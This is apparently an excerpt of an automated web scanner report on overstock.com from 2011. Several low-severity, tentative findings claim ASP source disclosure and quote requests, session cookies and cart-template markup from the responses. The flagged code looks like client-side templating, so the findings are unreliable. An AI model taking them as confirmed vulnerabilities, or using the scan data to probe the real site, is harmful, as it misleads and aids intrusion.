Cookie: mxcgotoast=; mxcsurftype=4; mxclastvisit=20110212; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^5731442606501422080|csbtmst^|csbcrt^|csbsfl^|mxcskupage^120|pageresult^120|country^US|currency^USD|language^en; ostk_aggr_session=sessstrt^1297527311612|csbshow^0|mxcshopmore^http://www.overstock.com/; ostk_campaign=; mbox=check#true#1297527454|session#1297527393397-20879#1297529254|PC#1297527393397-20879.17#1298736995; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Repeat%2520Untracked%7C1297529195100%3B; cinfo=ccnt^0:ctmst^1297527311613; se_list=se_list^0|4|;

Response

HTTP/1.1 200 OK
Date: Sat, 12 Feb 2011 16:31:25 GMT
Server: Apache
Expires: Sat, 12 Feb 2011 16:31:25 GMT
Pragma: no-cache
Set-Cookie: ostk_campaign=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: ostk_affiliate=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcproclicks=5213639|; Domain=.overstock.com; Expires=Sun, 12-Feb-2012 16:31:25 GMT; Path=/
Set-Cookie: mxclastvisit=20110212; Domain=.overstock.com; Expires=Sun, 12-Feb-2012 16:31:25 GMT; Path=/
Set-Cookie: mxcgotoast=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcsurftype=4; Domain=.overstock.com; Path=/
Keep-Alive: timeout=5, max=86
Connection: Keep-Alive, Keep-Alive
Encoding: iso-8859-1
Vary: Accept-Encoding,User-Agent
P3P: CP=CAO DSP COR CUR CUSi OUR BUS PHY ONL PUR NAV STA
Cache-Control: no-cache, no-store
Content-Type: text/html;charset=iso-8859-1
Content-Length: 128217

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN">


<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.facebook.com/2008/fbml">
<!-- Copyright 2009 Overstock.com --
...[SNIP]...
<![CDATA[

<% if(typeof cart !== 'undefined') {

var cartItems = cart.cartItems,
cartQty = document.getElementById('mini-cart-qty'),
cartQtyOld = document.getElementById('cart-quantity');
/*update cart quantity*/
if(cartQty && cartQtyOld) {cartQty.innerHTML = cartQtyOld.innerHTML = (cart.totalQuantity < 100 ) ? cart.totalQuantity : '99+';}

%>


<div class="bd">
<% if(cartItems.length > 0 || failedAdditionItems.length > 0) { %>
<ul id="mini-cart-items">
<%
render( this.renderFailedAdditions() );
render( this.renderLineItems() );
%>

</ul>

<% if(cart.orderTotals) { %>
<dl id="mini-cart-totals">
<% var reFree = /free/i,
totals = [
{label: 'Subtotal', type: 'subtotal', prefix:'', className: 'subtotal'},
{label: 'Coupon Savings', type: 'couponSavings', prefix: '-', className: 'discount'},
{label: 'Promotional Savings', type: 'promotionalSavings', prefix: '-', className: 'discount', href: '/11407/static.html'},
{label: 'In-Store Credit', type: 'instoreCredit', prefix: '-'},
{label: 'Gift Cards', type: 'giftCardCredit', prefix: '-'},
{label: 'Club O Rewards', type: 'clubORedemptionAmount', prefix: '-', className: 'discount'},
{label: 'Shipping', type: 'shippingCharge', prefix: ''},
{label: 'Tax', type: 'tax', prefix: ''},
{label: 'Total', type: 'grandTotal', prefix: '', className: 'order-total'}
];

for(var i=0; i < totals.length; i++)
{
var item = totals[i], className;

item.total = cart.orderTotals[item.type];
if(reFree.test(item.total))
{
item.className = 'discount';
}
className = (item.className) ? 'class="' + item.className + '"' : '';

if(item.total){ %>

<dt <%= className %>><% render((item.href) ? '<a href="'+ item.href +'" class="colorbox" target="_new">'+ item.label +'</a>' : item.label); %>:</dt>
...[SNIP]...
<dd <%= className %>><% render(item.prefix + item.total); %></dd>
...[SNIP]...
</dl>

<% } else { %>
<div id="mini-cart-totals">
...[SNIP]...
<span class="value subtotal" style="color: #c02; font-weight: bold;"><%= cart.subtotal %></span>
...[SNIP]...
<!-- MINI_CART_PROMO_SUPRESSED -->

<% } else if (cartItems.length == 0) { %>
<p class="message empty">
...[SNIP]...
<div class="ft">
<% if(cartItems.length > 0) { %>
<a href="<%= cart.checkoutUrl.replace(/\?.*/,'?TID=CartLayer') %>" id="mini-cart-checkout" class="button" title="Checkout Now">
...[SNIP]...
<% } %>
<% if(typeof cart.editUrl !== 'undefined') { %>
<a href="<%= cart.editUrl %>" id="mini-cart-edit" class="button" title="Edit Cart">
...[SNIP]...
</div>
<% } else { %>
<div class="bd has-error">
...[SNIP]...
<![CDATA[
<%
var classNames = '';
if(item.recentlyAdded)
{
classNames += ' added';
}
if(item.warningMessages && item.warningMessages.length > 0)
{
classNames += ' has-warning';
}
%>

<% /*display a heading for all previous items only once, items with errors or warnings should be pushed to the top*/
if(!this.hasPreviouslyAddedHeading && !item.recentlyAdded && item.warningMessages.length == 0) { %>

<li>
...[SNIP]...
</li>
<% this.hasPreviouslyAddedHeading = true;} %>

<li class="mini-cart-item <%= classNames %>">
<% render( this.renderMessage(item) ); %>
<div class="mini-cart-item-content">
...[SNIP]...
<a href="<%= item.productUrl %>" title="<%= item.productName %>">
...[SNIP]...
<img class="pro-thumb" width="60" height="60" src="<%= item.thumbnailUrl %>" alt="<%= item.productName %>">
...[SNIP]...
<span class="pro-name"><%= item.productName %></span>
...[SNIP]...
<span <% if(item.priceAfterSiteSalePercentOff) render('class="was"'); %>><%= item.undiscountedPrice %></span>
...[SNIP]...
<span class="sale"><%= item.priceAfterSiteSalePercentOff %></span>
...[SNIP]...
<span class="quantity"><%= item.quantity %></span>
...[SNIP]...
</span>
<% if(item.optionName) { %>
<span class="pro-options">
...[SNIP]...
<span class="options" title="<%= item.optionName %>"><%= item.optionName %></span>
...[SNIP]...
<button id="remove-<%= item.optionId %>" class="ostk-button remove-button" title="Remove This Item">
...[SNIP]...
</button>

<% render( this.renderItemWarranty(item) ); %>
</div>
...[SNIP]...
<li class="mini-cart-item has-error">
<% render( this.renderMessage(item) ); %>
<div class="mini-cart-item-content">
...[SNIP]...
<a href="<%= item.productUrl %>" title="<%= item.productName %>">
...[SNIP]...
<img class="pro-thumb" width="60" height="60" src="<%= item.thumbnailUrl %>" alt="<%= item.productName %>">
...[SNIP]...
<span class="pro-name"><%= item.productName %></span>
...[SNIP]...
</a>
<% if(item.optionName) { %>
<span class="pro-options">
...[SNIP]...
<span class="options" title="<%= item.optionName %>"><%= item.optionName %></span>
...[SNIP]...
<![CDATA[

<%
var msgType = (item.errorMessages) ? 'errorMessages' : 'warningMessages';

if(item[msgType].length <= 0) { %>

<% if(item.recentlyAdded) { %>
<p class="message">
...[SNIP]...
<% } %>
<% } else { %>
<p class="message">
...[SNIP]...
</i>
<% for(var i=0; i < item[msgType].length; i++) { %>
<% if(i === 0) { %>
<%= item[msgType][i] %>
<% continue; } %>
<span class="sub-message"><%= item[msgType][i] %></span>
...[SNIP]...
<![CDATA[

<% if(item.warrantyDetail) { %>
<span class="pro-warranty"><%= item.warrantyDetail.productName %>:
<span class="warranty" title="<%= item.productName %>"><%= item.productName %></span>
...[SNIP]...
<a href="" id="remove-<%= item.warrantyDetail.optionId %>" class="remove-warranty-button">
...[SNIP]...
<span class="price"><%= item.warrantyDetail.undiscountedPrice %></span>
</span>
<% } else if (item.orderLevelWarrantyOptionId) {
var warr = this.getOrderLevelWarrantOption(item.orderLevelWarrantyOptionId);
if(warr) { %>

<span class="pro-warranty"><%= warr.productName %>:
<span class="warranty">
...[SNIP]...
<% } %>
<% } else if(item.coverageDescription) { %>
<span class="pro-warranty">
...[SNIP]...
<span class="warranty"><%= item.coverageDescription %> <a href="<%= item.additionalInfoLink %>" target="_new">
...[SNIP]...
<ul>
                       <% for(var i=0, len = links.length; i < len; i++) {%>
                       <li>
...[SNIP]...
<a class="heading" target="_new" href="<%= links[i].clickUrl %>"><%= links[i].title %></a>
                               <%= links[i].desc %>
                               <span class="sitehost"><%= links[i].sitehost %></span>
...[SNIP]...

4.4. http://www.overstock.com/Clothing-Shoes/Tailorbyrd-Mens-V-neck-Argyle-Wool-Sweater/4822008/product.html  previous  next

Summary

Severity:   Low
Confidence:   Tentative
Host:   http://www.overstock.com
Path:   /Clothing-Shoes/Tailorbyrd-Mens-V-neck-Argyle-Wool-Sweater/4822008/product.html

Issue detail

The application appears to disclose some server-side source code written in ASP.

Request

GET /Clothing-Shoes/Tailorbyrd-Mens-V-neck-Argyle-Wool-Sweater/4822008/product.html HTTP/1.1
Host: www.overstock.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mxcgotoast=; mxcsurftype=4; mxclastvisit=20110212; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^5731442606501422080|csbtmst^|csbcrt^|csbsfl^|mxcskupage^120|pageresult^120|country^US|currency^USD|language^en; ostk_aggr_session=sessstrt^1297527311612|csbshow^0|mxcshopmore^http://www.overstock.com/; ostk_campaign=; mbox=check#true#1297527454|session#1297527393397-20879#1297529254|PC#1297527393397-20879.17#1298736995; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Repeat%2520Untracked%7C1297529195100%3B; cinfo=ccnt^0:ctmst^1297527311613; se_list=se_list^0|4|;

Response

HTTP/1.1 200 OK
Date: Sat, 12 Feb 2011 16:32:06 GMT
Server: Apache
Expires: Sat, 12 Feb 2011 16:32:06 GMT
Pragma: no-cache
Set-Cookie: mxcsurftype=4; Domain=.overstock.com; Path=/
Set-Cookie: mxcproclicks=4822008|; Domain=.overstock.com; Expires=Sun, 12-Feb-2012 16:32:06 GMT; Path=/
Set-Cookie: mxcgotoast=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxclastvisit=20110212; Domain=.overstock.com; Expires=Sun, 12-Feb-2012 16:32:06 GMT; Path=/
Set-Cookie: ostk_campaign=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: ostk_affiliate=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Keep-Alive: timeout=5, max=83
Connection: Keep-Alive, Keep-Alive
Encoding: iso-8859-1
Vary: Accept-Encoding,User-Agent
P3P: CP=CAO DSP COR CUR CUSi OUR BUS PHY ONL PUR NAV STA
Cache-Control: no-cache, no-store
Content-Type: text/html;charset=iso-8859-1
Content-Length: 119278

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN">


<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.facebook.com/2008/fbml">
<!-- Copyright 2009 Overstock.com --
...[SNIP]...
<![CDATA[

<% if(typeof cart !== 'undefined') {

var cartItems = cart.cartItems,
cartQty = document.getElementById('mini-cart-qty'),
cartQtyOld = document.getElementById('cart-quantity');
/*update cart quantity*/
if(cartQty && cartQtyOld) {cartQty.innerHTML = cartQtyOld.innerHTML = (cart.totalQuantity < 100 ) ? cart.totalQuantity : '99+';}

%>


<div class="bd">
<% if(cartItems.length > 0 || failedAdditionItems.length > 0) { %>
<ul id="mini-cart-items">
<%
render( this.renderFailedAdditions() );
render( this.renderLineItems() );
%>

</ul>

<% if(cart.orderTotals) { %>
<dl id="mini-cart-totals">
<% var reFree = /free/i,
totals = [
{label: 'Subtotal', type: 'subtotal', prefix:'', className: 'subtotal'},
{label: 'Coupon Savings', type: 'couponSavings', prefix: '-', className: 'discount'},
{label: 'Promotional Savings', type: 'promotionalSavings', prefix: '-', className: 'discount', href: '/11407/static.html'},
{label: 'In-Store Credit', type: 'instoreCredit', prefix: '-'},
{label: 'Gift Cards', type: 'giftCardCredit', prefix: '-'},
{label: 'Club O Rewards', type: 'clubORedemptionAmount', prefix: '-', className: 'discount'},
{label: 'Shipping', type: 'shippingCharge', prefix: ''},
{label: 'Tax', type: 'tax', prefix: ''},
{label: 'Total', type: 'grandTotal', prefix: '', className: 'order-total'}
];

for(var i=0; i < totals.length; i++)
{
var item = totals[i], className;

item.total = cart.orderTotals[item.type];
if(reFree.test(item.total))
{
item.className = 'discount';
}
className = (item.className) ? 'class="' + item.className + '"' : '';

if(item.total){ %>

<dt <%= className %>><% render((item.href) ? '<a href="'+ item.href +'" class="colorbox" target="_new">'+ item.label +'</a>' : item.label); %>:</dt>
...[SNIP]...
<dd <%= className %>><% render(item.prefix + item.total); %></dd>
...[SNIP]...
</dl>

<% } else { %>
<div id="mini-cart-totals">
...[SNIP]...
<span class="value subtotal" style="color: #c02; font-weight: bold;"><%= cart.subtotal %></span>
...[SNIP]...
<!-- MINI_CART_PROMO_SUPRESSED -->

<% } else if (cartItems.length == 0) { %>
<p class="message empty">
...[SNIP]...
<div class="ft">
<% if(cartItems.length > 0) { %>
<a href="<%= cart.checkoutUrl.replace(/\?.*/,'?TID=CartLayer') %>" id="mini-cart-checkout" class="button" title="Checkout Now">
...[SNIP]...
<% } %>
<% if(typeof cart.editUrl !== 'undefined') { %>
<a href="<%= cart.editUrl %>" id="mini-cart-edit" class="button" title="Edit Cart">
...[SNIP]...
</div>
<% } else { %>
<div class="bd has-error">
...[SNIP]...
<![CDATA[
<%
var classNames = '';
if(item.recentlyAdded)
{
classNames += ' added';
}
if(item.warningMessages && item.warningMessages.length > 0)
{
classNames += ' has-warning';
}
%>

<% /*display a heading for all previous items only once, items with errors or warnings should be pushed to the top*/
if(!this.hasPreviouslyAddedHeading && !item.recentlyAdded && item.warningMessages.length == 0) { %>

<li>
...[SNIP]...
</li>
<% this.hasPreviouslyAddedHeading = true;} %>

<li class="mini-cart-item <%= classNames %>">
<% render( this.renderMessage(item) ); %>
<div class="mini-cart-item-content">
...[SNIP]...
<a href="<%= item.productUrl %>" title="<%= item.productName %>">
...[SNIP]...
<img class="pro-thumb" width="60" height="60" src="<%= item.thumbnailUrl %>" alt="<%= item.productName %>">
...[SNIP]...
<span class="pro-name"><%= item.productName %></span>
...[SNIP]...
<span <% if(item.priceAfterSiteSalePercentOff) render('class="was"'); %>><%= item.undiscountedPrice %></span>
...[SNIP]...
<span class="sale"><%= item.priceAfterSiteSalePercentOff %></span>
...[SNIP]...
<span class="quantity"><%= item.quantity %></span>
...[SNIP]...
</span>
<% if(item.optionName) { %>
<span class="pro-options">
...[SNIP]...
<span class="options" title="<%= item.optionName %>"><%= item.optionName %></span>
...[SNIP]...
<button id="remove-<%= item.optionId %>" class="ostk-button remove-button" title="Remove This Item">
...[SNIP]...
</button>

<% render( this.renderItemWarranty(item) ); %>
</div>
...[SNIP]...
<li class="mini-cart-item has-error">
<% render( this.renderMessage(item) ); %>
<div class="mini-cart-item-content">
...[SNIP]...
<a href="<%= item.productUrl %>" title="<%= item.productName %>">
...[SNIP]...
<img class="pro-thumb" width="60" height="60" src="<%= item.thumbnailUrl %>" alt="<%= item.productName %>">
...[SNIP]...
<span class="pro-name"><%= item.productName %></span>
...[SNIP]...
</a>
<% if(item.optionName) { %>
<span class="pro-options">
...[SNIP]...
<span class="options" title="<%= item.optionName %>"><%= item.optionName %></span>
...[SNIP]...
<![CDATA[

<%
var msgType = (item.errorMessages) ? 'errorMessages' : 'warningMessages';

if(item[msgType].length <= 0) { %>

<% if(item.recentlyAdded) { %>
<p class="message">
...[SNIP]...
<% } %>
<% } else { %>
<p class="message">
...[SNIP]...
</i>
<% for(var i=0; i < item[msgType].length; i++) { %>
<% if(i === 0) { %>
<%= item[msgType][i] %>
<% continue; } %>
<span class="sub-message"><%= item[msgType][i] %></span>
...[SNIP]...
<![CDATA[

<% if(item.warrantyDetail) { %>
<span class="pro-warranty"><%= item.warrantyDetail.productName %>:
<span class="warranty" title="<%= item.productName %>"><%= item.productName %></span>
...[SNIP]...
<a href="" id="remove-<%= item.warrantyDetail.optionId %>" class="remove-warranty-button">
...[SNIP]...
<span class="price"><%= item.warrantyDetail.undiscountedPrice %></span>
</span>
<% } else if (item.orderLevelWarrantyOptionId) {
var warr = this.getOrderLevelWarrantOption(item.orderLevelWarrantyOptionId);
if(warr) { %>

<span class="pro-warranty"><%= warr.productName %>:
<span class="warranty">
...[SNIP]...
<% } %>
<% } else if(item.coverageDescription) { %>
<span class="pro-warranty">
...[SNIP]...
<span class="warranty"><%= item.coverageDescription %> <a href="<%= item.additionalInfoLink %>" target="_new">
...[SNIP]...
<ul>
                       <% for(var i=0, len = links.length; i < len; i++) {%>
                       <li>
...[SNIP]...
<a class="heading" target="_new" href="<%= links[i].clickUrl %>"><%= links[i].title %></a>
                               <%= links[i].desc %>
                               <span class="sitehost"><%= links[i].sitehost %></span>
...[SNIP]...

4.5. http://www.overstock.com/Home-Garden/1/store.html  previous  next

Summary

Severity:   Low
Confidence:   Tentative
Host:   http://www.overstock.com
Path:   /Home-Garden/1/store.html

Issue detail

The application appears to disclose some server-side source code written in ASP.

Request

GET /Home-Garden/1/store.html HTTP/1.1
Host: www.overstock.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mxcgotoast=; mxcsurftype=4; mxclastvisit=20110212; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^5731442606501422080|csbtmst^|csbcrt^|csbsfl^|mxcskupage^120|pageresult^120|country^US|currency^USD|language^en; ostk_aggr_session=sessstrt^1297527311612|csbshow^0|mxcshopmore^http://www.overstock.com/; ostk_campaign=; mbox=check#true#1297527454|session#1297527393397-20879#1297529254|PC#1297527393397-20879.17#1298736995; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Repeat%2520Untracked%7C1297529195100%3B; cinfo=ccnt^0:ctmst^1297527311613; se_list=se_list^0|4|;

Response

HTTP/1.1 200 OK
Date: Sat, 12 Feb 2011 16:28:42 GMT
Server: Apache
Expires: Sat, 12 Feb 2011 16:28:43 GMT
Pragma: no-cache
Set-Cookie: mxcgotoast=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: ostk_aggr_session=sessstrt^1297527311612|csbshow^0|mxcshopmore^Home-Garden/1/store.html|searchhistory^categories; Domain=.overstock.com; Path=/
Set-Cookie: mxcsurftype=4; Domain=.overstock.com; Path=/
Set-Cookie: ostk_affiliate=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxclastvisit=20110212; Domain=.overstock.com; Expires=Sun, 12-Feb-2012 16:28:43 GMT; Path=/
Set-Cookie: ostk_campaign=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Keep-Alive: timeout=5, max=71
Connection: Keep-Alive, Keep-Alive
Encoding: iso-8859-1
Vary: Accept-Encoding,User-Agent
P3P: CP=CAO DSP COR CUR CUSi OUR BUS PHY ONL PUR NAV STA
Cache-Control: no-cache, no-store
Content-Type: text/html;charset=iso-8859-1
Content-Length: 272482

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN">


<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.facebook.com/2008/fbml">
<!-- Copyright 2009 Overstock.com --
...[SNIP]...
<![CDATA[

<% if(typeof cart !== 'undefined') {

var cartItems = cart.cartItems,
cartQty = document.getElementById('mini-cart-qty'),
cartQtyOld = document.getElementById('cart-quantity');
/*update cart quantity*/
if(cartQty && cartQtyOld) {cartQty.innerHTML = cartQtyOld.innerHTML = (cart.totalQuantity < 100 ) ? cart.totalQuantity : '99+';}

%>


<div class="bd">
<% if(cartItems.length > 0 || failedAdditionItems.length > 0) { %>
<ul id="mini-cart-items">
<%
render( this.renderFailedAdditions() );
render( this.renderLineItems() );
%>

</ul>

<% if(cart.orderTotals) { %>
<dl id="mini-cart-totals">
<% var reFree = /free/i,
totals = [
{label: 'Subtotal', type: 'subtotal', prefix:'', className: 'subtotal'},
{label: 'Coupon Savings', type: 'couponSavings', prefix: '-', className: 'discount'},
{label: 'Promotional Savings', type: 'promotionalSavings', prefix: '-', className: 'discount', href: '/11407/static.html'},
{label: 'In-Store Credit', type: 'instoreCredit', prefix: '-'},
{label: 'Gift Cards', type: 'giftCardCredit', prefix: '-'},
{label: 'Club O Rewards', type: 'clubORedemptionAmount', prefix: '-', className: 'discount'},
{label: 'Shipping', type: 'shippingCharge', prefix: ''},
{label: 'Tax', type: 'tax', prefix: ''},
{label: 'Total', type: 'grandTotal', prefix: '', className: 'order-total'}
];

for(var i=0; i < totals.length; i++)
{
var item = totals[i], className;

item.total = cart.orderTotals[item.type];
if(reFree.test(item.total))
{
item.className = 'discount';
}
className = (item.className) ? 'class="' + item.className + '"' : '';

if(item.total){ %>

<dt <%= className %>><% render((item.href) ? '<a href="'+ item.href +'" class="colorbox" target="_new">'+ item.label +'</a>' : item.label); %>:</dt>
...[SNIP]...
<dd <%= className %>><% render(item.prefix + item.total); %></dd>
...[SNIP]...
</dl>

<% } else { %>
<div id="mini-cart-totals">
...[SNIP]...
<span class="value subtotal" style="color: #c02; font-weight: bold;"><%= cart.subtotal %></span>
...[SNIP]...
<!-- MINI_CART_PROMO_SUPRESSED -->

<% } else if (cartItems.length == 0) { %>
<p class="message empty">
...[SNIP]...
<div class="ft">
<% if(cartItems.length > 0) { %>
<a href="<%= cart.checkoutUrl.replace(/\?.*/,'?TID=CartLayer') %>" id="mini-cart-checkout" class="button" title="Checkout Now">
...[SNIP]...
<% } %>
<% if(typeof cart.editUrl !== 'undefined') { %>
<a href="<%= cart.editUrl %>" id="mini-cart-edit" class="button" title="Edit Cart">
...[SNIP]...
</div>
<% } else { %>
<div class="bd has-error">
...[SNIP]...
<![CDATA[
<%
var classNames = '';
if(item.recentlyAdded)
{
classNames += ' added';
}
if(item.warningMessages && item.warningMessages.length > 0)
{
classNames += ' has-warning';
}
%>

<% /*display a heading for all previous items only once, items with errors or warnings should be pushed to the top*/
if(!this.hasPreviouslyAddedHeading && !item.recentlyAdded && item.warningMessages.length == 0) { %>

<li>
...[SNIP]...
</li>
<% this.hasPreviouslyAddedHeading = true;} %>

<li class="mini-cart-item <%= classNames %>">
<% render( this.renderMessage(item) ); %>
<div class="mini-cart-item-content">
...[SNIP]...
<a href="<%= item.productUrl %>" title="<%= item.productName %>">
...[SNIP]...
<img class="pro-thumb" width="60" height="60" src="<%= item.thumbnailUrl %>" alt="<%= item.productName %>">
...[SNIP]...
<span class="pro-name"><%= item.productName %></span>
...[SNIP]...
<span <% if(item.priceAfterSiteSalePercentOff) render('class="was"'); %>><%= item.undiscountedPrice %></span>
...[SNIP]...
<span class="sale"><%= item.priceAfterSiteSalePercentOff %></span>
...[SNIP]...
<span class="quantity"><%= item.quantity %></span>
...[SNIP]...
</span>
<% if(item.optionName) { %>
<span class="pro-options">
...[SNIP]...
<span class="options" title="<%= item.optionName %>"><%= item.optionName %></span>
...[SNIP]...
<button id="remove-<%= item.optionId %>" class="ostk-button remove-button" title="Remove This Item">
...[SNIP]...
</button>

<% render( this.renderItemWarranty(item) ); %>
</div>
...[SNIP]...
<li class="mini-cart-item has-error">
<% render( this.renderMessage(item) ); %>
<div class="mini-cart-item-content">
...[SNIP]...
<a href="<%= item.productUrl %>" title="<%= item.productName %>">
...[SNIP]...
<img class="pro-thumb" width="60" height="60" src="<%= item.thumbnailUrl %>" alt="<%= item.productName %>">
...[SNIP]...
<span class="pro-name"><%= item.productName %></span>
...[SNIP]...
</a>
<% if(item.optionName) { %>
<span class="pro-options">
...[SNIP]...
<span class="options" title="<%= item.optionName %>"><%= item.optionName %></span>
...[SNIP]...
<![CDATA[

<%
var msgType = (item.errorMessages) ? 'errorMessages' : 'warningMessages';

if(item[msgType].length <= 0) { %>

<% if(item.recentlyAdded) { %>
<p class="message">
...[SNIP]...
<% } %>
<% } else { %>
<p class="message">
...[SNIP]...
</i>
<% for(var i=0; i < item[msgType].length; i++) { %>
<% if(i === 0) { %>
<%= item[msgType][i] %>
<% continue; } %>
<span class="sub-message"><%= item[msgType][i] %></span>
...[SNIP]...
<![CDATA[

<% if(item.warrantyDetail) { %>
<span class="pro-warranty"><%= item.warrantyDetail.productName %>:
<span class="warranty" title="<%= item.productName %>"><%= item.productName %></span>
...[SNIP]...
<a href="" id="remove-<%= item.warrantyDetail.optionId %>" class="remove-warranty-button">
...[SNIP]...
<span class="price"><%= item.warrantyDetail.undiscountedPrice %></span>
</span>
<% } else if (item.orderLevelWarrantyOptionId) {
var warr = this.getOrderLevelWarrantOption(item.orderLevelWarrantyOptionId);
if(warr) { %>

<span class="pro-warranty"><%= warr.productName %>:
<span class="warranty">
...[SNIP]...
<% } %>
<% } else if(item.coverageDescription) { %>
<span class="pro-warranty">
...[SNIP]...
<span class="warranty"><%= item.coverageDescription %> <a href="<%= item.additionalInfoLink %>" target="_new">
...[SNIP]...
<ul>
                       <% for(var i=0, len = links.length; i < len; i++) {%>
                       <li>
...[SNIP]...
<a class="heading" target="_new" href="<%= links[i].clickUrl %>"><%= links[i].title %></a>
                               <%= links[i].desc %>
                               <span class="sitehost"><%= links[i].sitehost %></span>
...[SNIP]...

4.6. http://www.overstock.com/Home-Garden/Bedding-Bath/1/dept.html  previous  next

Summary

Severity:   Low
Confidence:   Tentative
Host:   http://www.overstock.com
Path:   /Home-Garden/Bedding-Bath/1/dept.html

Issue detail

The application appears to disclose some server-side source code written in ASP.

Request

GET /Home-Garden/Bedding-Bath/1/dept.html HTTP/1.1
Host: www.overstock.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mxcgotoast=; mxcsurftype=4; mxclastvisit=20110212; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^5731442606501422080|csbtmst^|csbcrt^|csbsfl^|mxcskupage^120|pageresult^120|country^US|currency^USD|language^en; ostk_aggr_session=sessstrt^1297527311612|csbshow^0|mxcshopmore^http://www.overstock.com/; ostk_campaign=; mbox=check#true#1297527454|session#1297527393397-20879#1297529254|PC#1297527393397-20879.17#1298736995; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Repeat%2520Untracked%7C1297529195100%3B; cinfo=ccnt^0:ctmst^1297527311613; se_list=se_list^0|4|;

Response

HTTP/1.1 200 OK
Date: Sat, 12 Feb 2011 16:28:44 GMT
Server: Apache
Expires: Sat, 12 Feb 2011 16:28:44 GMT
Pragma: no-cache
Set-Cookie: mxcsurftype=4; Domain=.overstock.com; Path=/
Set-Cookie: mxcgotoast=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxclastvisit=20110212; Domain=.overstock.com; Expires=Sun, 12-Feb-2012 16:28:44 GMT; Path=/
Set-Cookie: ostk_aggr_session=sessstrt^1297527311612|csbshow^0|mxcshopmore^Home-Garden/Bedding-Bath/1/dept.html|searchhistory^categories; Domain=.overstock.com; Path=/
Set-Cookie: ostk_campaign=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: ostk_affiliate=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Keep-Alive: timeout=5, max=92
Connection: Keep-Alive, Keep-Alive
Encoding: iso-8859-1
Vary: Accept-Encoding,User-Agent
P3P: CP=CAO DSP COR CUR CUSi OUR BUS PHY ONL PUR NAV STA
Cache-Control: no-cache, no-store
Content-Type: text/html;charset=iso-8859-1
Content-Length: 285996

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN">


<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.facebook.com/2008/fbml">
<!-- Copyright 2009 Overstock.com --
...[SNIP]...
<![CDATA[

<% if(typeof cart !== 'undefined') {

var cartItems = cart.cartItems,
cartQty = document.getElementById('mini-cart-qty'),
cartQtyOld = document.getElementById('cart-quantity');
/*update cart quantity*/
if(cartQty && cartQtyOld) {cartQty.innerHTML = cartQtyOld.innerHTML = (cart.totalQuantity < 100 ) ? cart.totalQuantity : '99+';}

%>


<div class="bd">
<% if(cartItems.length > 0 || failedAdditionItems.length > 0) { %>
<ul id="mini-cart-items">
<%
render( this.renderFailedAdditions() );
render( this.renderLineItems() );
%>

</ul>

<% if(cart.orderTotals) { %>
<dl id="mini-cart-totals">
<% var reFree = /free/i,
totals = [
{label: 'Subtotal', type: 'subtotal', prefix:'', className: 'subtotal'},
{label: 'Coupon Savings', type: 'couponSavings', prefix: '-', className: 'discount'},
{label: 'Promotional Savings', type: 'promotionalSavings', prefix: '-', className: 'discount', href: '/11407/static.html'},
{label: 'In-Store Credit', type: 'instoreCredit', prefix: '-'},
{label: 'Gift Cards', type: 'giftCardCredit', prefix: '-'},
{label: 'Club O Rewards', type: 'clubORedemptionAmount', prefix: '-', className: 'discount'},
{label: 'Shipping', type: 'shippingCharge', prefix: ''},
{label: 'Tax', type: 'tax', prefix: ''},
{label: 'Total', type: 'grandTotal', prefix: '', className: 'order-total'}
];

for(var i=0; i < totals.length; i++)
{
var item = totals[i], className;

item.total = cart.orderTotals[item.type];
if(reFree.test(item.total))
{
item.className = 'discount';
}
className = (item.className) ? 'class="' + item.className + '"' : '';

if(item.total){ %>

<dt <%= className %>><% render((item.href) ? '<a href="'+ item.href +'" class="colorbox" target="_new">'+ item.label +'</a>' : item.label); %>:</dt>
...[SNIP]...
